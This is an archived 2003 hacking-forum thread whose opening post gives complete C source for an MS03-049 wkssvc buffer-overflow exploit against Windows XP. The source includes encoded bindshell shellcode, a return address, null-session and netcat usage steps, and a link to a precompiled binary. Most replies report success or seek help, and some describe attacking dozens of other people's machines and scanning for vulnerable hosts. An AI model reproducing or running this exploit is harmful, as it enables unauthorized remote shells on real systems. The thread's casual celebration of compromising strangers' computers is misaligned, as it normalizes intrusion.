This wasn't posted yet so, the code only runs on xp. My isp blocks netbios so i haven't tested it yet but i heard it works. Let me know if it works for you.
Greetz Double-=V=-
CODE
/* ms03-049 by wirepair, pretty sweet find, although i can only get this to work on XP. Win2k responds with like op rng error stating it doesn't know what the hell i'm requesting. Eeye seemed to elude to the fact that 'only xp has these undocumented api's or something, anyways sc is from oc.192's awesome rpc exploit. This is beta and the code is friggen disgusting. It was a hack job basically, but it works and i've tested it on 2 XP no sp machines. I'll add the 'change bindshell port' later. It shouldn't crash the box either, at least in my cases exitthread does the trick. This code proves how little i know about crazy windows string stuff if you see a bunch of crap that makes no sense like weird casting. Update: heh this crazy string crap is exactly why it wasn't working, after reviewing packet dumps my strings became seriously malformated. Oh well learn something new every day, Thanks again Dave. After playing with the each SP, I have come to the conclusion that xp sp1a and sp0 deal with unicode strings differently. I'm forced to use the MultiByteToWideChar for SP0 to process my string (\x89 \x81) seem to change the single byte to 2 bytes instead of a null and a byte. SP1 gladly takes my own unicode string but will *not* accept the MultiByteToWide. I will investigate somehow trying to remotely tell which service pack the remote victim is by trying to get it to respond with a unicode string and somehow have it include a 89 or 81 character so i can see the difference, then scan the buff and hope i can find any clues to which sp the remote host is. If anyone has some other ideas please drop me a email wirepair@sh0dan.org or wirepair@roguemail.net Thanks. Snag the exe: http://sh0dan.org/files/0349.exe if yer lazy Usage: C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:"" C:\>0349 ip.ip.ip.ip 1 open new cmd: C:\>nc ip.ip.ip.ip 4444 Republish: www.SecurityLab.ru */
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL, IN LPCWSTR AlternateName, IN LPCWSTR DomainAccount OPTIONAL, IN LPCWSTR DomainAccountPassword OPTIONAL, IN ULONG Reserved ); int main(int argc, char **argv) { char overwrite[2045] = ""; char sc[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; char exp_buf[2045+4+16+501]; char ip[30]; LPWSTR ipl[60]; DWORD jmpesp = 0x7518A747; LPWSTR unicodesp0[(2045+4+16+501)*2]; char unicode[(2045+4+16+501)*2]; int i = 0; int x = 0; int len = 0; HINSTANCE hinstLib; MYPROC ProcAddr; BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;
if (argc < 3) { fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n"); fprintf(stderr, "Usage: %s <ip> <sp>\n",argv[0]); fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\""\ "\nC:\\>0349 ip.ip.ip.ip 1 (or 0)\n"\ "open new cmd:\n"\ "C:\\>nc ip.ip.ip.ip 4444\n"\ "If it doesn't hang the ip's invalid or it did not work\n"); exit(1); }
printf("Attacking: %s\n",argv[1]);
_snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:)
hinstLib = LoadLibrary("netapi32.dll");
memset(overwrite, 0x41, 2000); memset(overwrite+2000, 0x90, 44); memcpy(exp_buf, overwrite, 2044); memcpy(exp_buf+2044, &jmpesp, 4); memset(exp_buf+2048, 0x90, 16); memcpy(exp_buf+2064, sc, sizeof(sc)); if(atoi(argv[2]) == 1) { memset(unicode, 0x00, sizeof(unicode)); for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) { // roll my own; stupid multibytetosuck broke my string. unicode[i] = exp_buf[x]; // my thanks goes to dave aitel for mentioning this to me. } } else { len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0)); } MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60); //fprintf(stderr, "%s", exp_buf); //return(0); //wprintf(L"\n%s",ipl); //len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicode,sizeof(unicode));
if (hinstLib != NULL) { ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName"); if (NULL != ProcAddr) { fRunTimeLinkSuccess = TRUE; printf("\nGetProcAddr: %x\n", *ProcAddr); printf("Sending exploit, you should be able to nc to the host\n"); if (atoi(argv[2]) == 1) { (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); } else { (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0); } } else { printf("procaddr null\n"); }
Hmm, looks cool, I am about to test it, so I return with some results.
Regards, LiquidSilver.
xaph
Dec 1 2003, 01:32 PM
works great thx. a lot!!!! RESPECT!!!
Tested on a WinXP SP1 machine!!!! nice job!!
liquidSilver
Dec 1 2003, 01:34 PM
...back, yes it worked first time i tried. Hmm.. Wierd.
Ow, well, nice expliot - great!
Regards, LiquidSilver.
DJVASTVASTY2K
Dec 1 2003, 02:16 PM
Double-=V=-
Thanks 4 This Exp
Will Test And Let You Know
Best Regards
Adam
Vast Gsm Team
liquidSilver
Dec 1 2003, 03:13 PM
Hmm, I tried testing it on Win2k sys. Got an error.
Oh, well, it aint for Win2k either. Just a little try-out anyway
Xenos
Dec 1 2003, 03:28 PM
Great Job dude, I'll check if it's work perfeclty.. Thanks again for everyone.
boshcash
Dec 1 2003, 04:17 PM
niiice , works perfectly
ducky
Dec 1 2003, 05:40 PM
wow !! thanks a lot m8..worked on my XP sp0 too....
Fletcher
Dec 1 2003, 05:42 PM
Thx for sharing! i will test it soon
yeyo
Dec 1 2003, 05:58 PM
Thanks man, lets give it a try
ducky
Dec 1 2003, 06:15 PM
Another Prob : this vuln got 3 ports...which one of then used in this exploit?? Tried to find something but no success...so if anyone know plz tell me
Cheerz
Droezel
Dec 1 2003, 06:26 PM
Works great!
passi
Dec 1 2003, 06:27 PM
does anybody know how to scan for vulnerable workstations?
greetz, passiw
low_rider
Dec 1 2003, 08:04 PM
thnx dude nice work
vnet576
Dec 1 2003, 08:25 PM
nice..hehe i like this one...gave root on my winxp machine!
hulk
Dec 1 2003, 09:14 PM
Yep it also gave me root on my xp machine good work
wlingard
Dec 1 2003, 10:22 PM
Yes this works fine on your local system/network... but please correct me somebody if I'm wrong... it doesn't work remotely.. doesn't here on my test network anyways.
//WL
WeeDMoNKeY
Dec 4 2003, 01:01 AM
nope dont think so, erm, or when i tried rather
extreme
Dec 4 2003, 02:03 AM
I apollogise if someone already posted this, but I can't seem to find a good reliable scanner for this exploit.. If there is one at all. Or should I just use port scanner and scan certain ports?
PSR
Dec 4 2003, 11:01 AM
well since we're a gr8 big good old family here just check this board for a scanner. search up at the top and u might b suprised cause u have ran into a xscan ms0349 plugin which a very good dude coded and actually works rather good.
k done my good deed for this year j/k
extreme
Dec 4 2003, 11:36 AM
Shit. This plugin seks all vunaruble systems.. And this one works only for XP.. Is there a way to recognise if the system is XP or 2k????
liquidSilver
Dec 4 2003, 02:36 PM
Maybe a stupid question, but ehrrrmm.. Does it even work remote?
Basti
Dec 4 2003, 03:27 PM
same question here if i can hack with that exploit like with this one for win2000..
doesn t work here yet
Action
Dec 4 2003, 06:27 PM
i hav a problem, when i type C:\real>0349 *.*.*.* 0 Attacking: *.*.*.* procaddr null
i always get that,what does it mean
liquidSilver
Dec 4 2003, 07:33 PM
Action: It means that the target you are trying to attack runs Win2k and NOT WinXP!
....As far as I know.. I could be wrong.
Test24
Dec 4 2003, 10:40 PM
hello
is somebody can tell us if there is a way to know the os running on a remote machine and is there a way to hidden it thanks
Basti
Dec 4 2003, 11:51 PM
QUOTE (Test24 @ Dec 4 2003, 11:40 PM)
hello
is somebody can tell us if there is a way to know the os running on a remote machine and is there a way to hidden it thanks
e.g. scan with languard...
tolf
Dec 5 2003, 01:45 AM
QUOTE (wlingard @ Dec 1 2003, 10:22 PM)
Yes this works fine on your local system/network... but please correct me somebody if I'm wrong... it doesn't work remotely.. doesn't here on my test network anyways.
//WL
yep doesnt work remote but you can run it locally, then netcat to the target remotely & it will give a shell... Problem is getting it to run on the target mahcine..
Any thoughts on how to do this with normal user privs?
Double-=V=-
Dec 5 2003, 10:58 AM
QUOTE (Action @ Dec 4 2003, 06:27 PM)
i hav a problem, when i type C:\real>0349 *.*.*.* 0 Attacking: *.*.*.* procaddr null
i always get that,what does it mean
Maby you should READ
/* ms03-049 by wirepair, pretty sweet find, although i can only get this to work on XP. Win2k responds with like op rng error stating it doesn't know what the hell i'm requesting. Eeye seemed to elude to the fact that 'only xp has these undocumented api's or something,
(You can only run the code *from* winXp to winXp.)
This should work remotely, net use //ip/IPC$ 0349 ip 1
T-BoNe
Dec 5 2003, 09:21 PM
i tested with about 200 ip's. doesn't work ?
but if i test it local it works like a charm =p
Kynroxes
Dec 5 2003, 10:15 PM
w00w00 Double-=V=- u rox and own the world around ... I test it now, tks I mustn't compile the source ... u rulezzzzzz !!
Toilal
Dec 6 2003, 01:42 AM
Hi T-BoNe, i think i know you :x
It works !! but you need to run it on a lan because a null IPC session need to be set by the exploit. And i think on windows XP, IPC is open only to the lan by default. Isn't it ? Try to use the xscan plugin i've coded and posted a few day ago. If the ip doesn't appear vulnerable after the scan, then it really WONT be exploitable.
Got about 25 boxes on a lan, really nice . If the exploit freeze, then the shell is probably open. If it doesn't freeze, then try the next computer.
Thx for the exploit !
extreme
Dec 6 2003, 01:50 AM
Wait a minute.. If I have LAN sett up here, I can exploit remote copmuters on the net? Or only the ones I am conected to via LAN??? 2nd question. Is there any successfull version for Win2k?
thesource
Dec 6 2003, 02:22 AM
tried on my lan. got this:
C:\Documents and Settings\mike\Desktop>0349.exe 192.168.1.105 1 Attacking: 192.168.1.105 procaddr null
hmm what would yall suggest doing next. i tried telneting to it. but it didn't respond :/
Toilal
Dec 6 2003, 02:55 AM
QUOTE (extreme @ Dec 6 2003, 01:50 AM)
Wait a minute.. If I have LAN sett up here, I can exploit remote copmuters on the net? Or only the ones I am conected to via LAN???
You won't be able to exploit remote computer on the net.
boshcash
Dec 6 2003, 11:45 AM
guys its not just a local exploit , is a remote exploit !! dont blame the exploit , blame the ISPs that blocked port 139 , port 445 and 135 , i tried it on on a network user and worked , also worked on a remote user using same ISP , because my ISP doesnt block ports from its users ..
Divx_dude
Dec 6 2003, 04:06 PM
Man this one ownz i had 20 targets and 15 where succesfull
thanx allot dude
mnemonix
Dec 6 2003, 06:49 PM
damn nice work .. it worked local end remote
credits to you ..
101
Dec 6 2003, 07:56 PM
hint/
WeeDMoNKeY
Dec 6 2003, 10:23 PM
ive tried it on so many computers, i got nothing, even with the open ports and everything, you guys sure this works remote?
maxxis
Dec 7 2003, 01:00 AM
I check 5IP and not works ;(
thesource
Dec 7 2003, 01:46 AM
is it supposed to connect after exploited? or do you have to telnet to it?
SLiM577
Dec 7 2003, 06:01 AM
Ermmm im having some trouble here.
QUOTE
C:\Documents and Settings\SLiM\Desktop>0349 1**.***.**.*** 0 Attacking: 12*.***.***.***
GetProcAddr: 71c59530 Sending exploit, you should be able to nc to the host
C:\Documents and Settings\SLiM\Desktop>
Then i try to Telnet into the remote host on port 4444
nothing =/ any suggests on wat im doing wrong.
)Oni(
Dec 7 2003, 06:18 AM
lol meeeeen i tried my first IP on the Net ... and what happends ? something ...
Sending exploit ... Ok
and then ... telnet port 4444
well
And at the remote host comes : Enter Your Password :
other question : must i try every IP with net use ???? or can i exploit all the IPs and hope that he gives me a connect
WeeDMoNKeY
Dec 7 2003, 08:12 AM
i see what i might have been doing wrong, ill take a gander, ive made a auto h4xxor bat thing that MIGHT work, if it does ill post the shit for ya fellas
z0mbi3
Dec 7 2003, 08:35 AM
make a nul session then firup the exploit...you'll see that it hangs since nothing happens...thats a good sign then open a new command prompt then nc ip 4444 and voila
gr8 work....
WeeDMoNKeY
Dec 7 2003, 10:09 AM
make null sessions before we run the exploit on teh machine? i thought it was the otehr way around? im cold and cant tpye .
djexplosion
Dec 7 2003, 01:30 PM
i tried it but i cant get it too work @ most the targets the exploits doesnt hangs. bnut xscan says there vurnable.
so i netcat too it and it doesnt connect. any help ?
SLiM577
Dec 7 2003, 09:00 PM
where is the plug in on x-focus site anyone got the name of the file?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
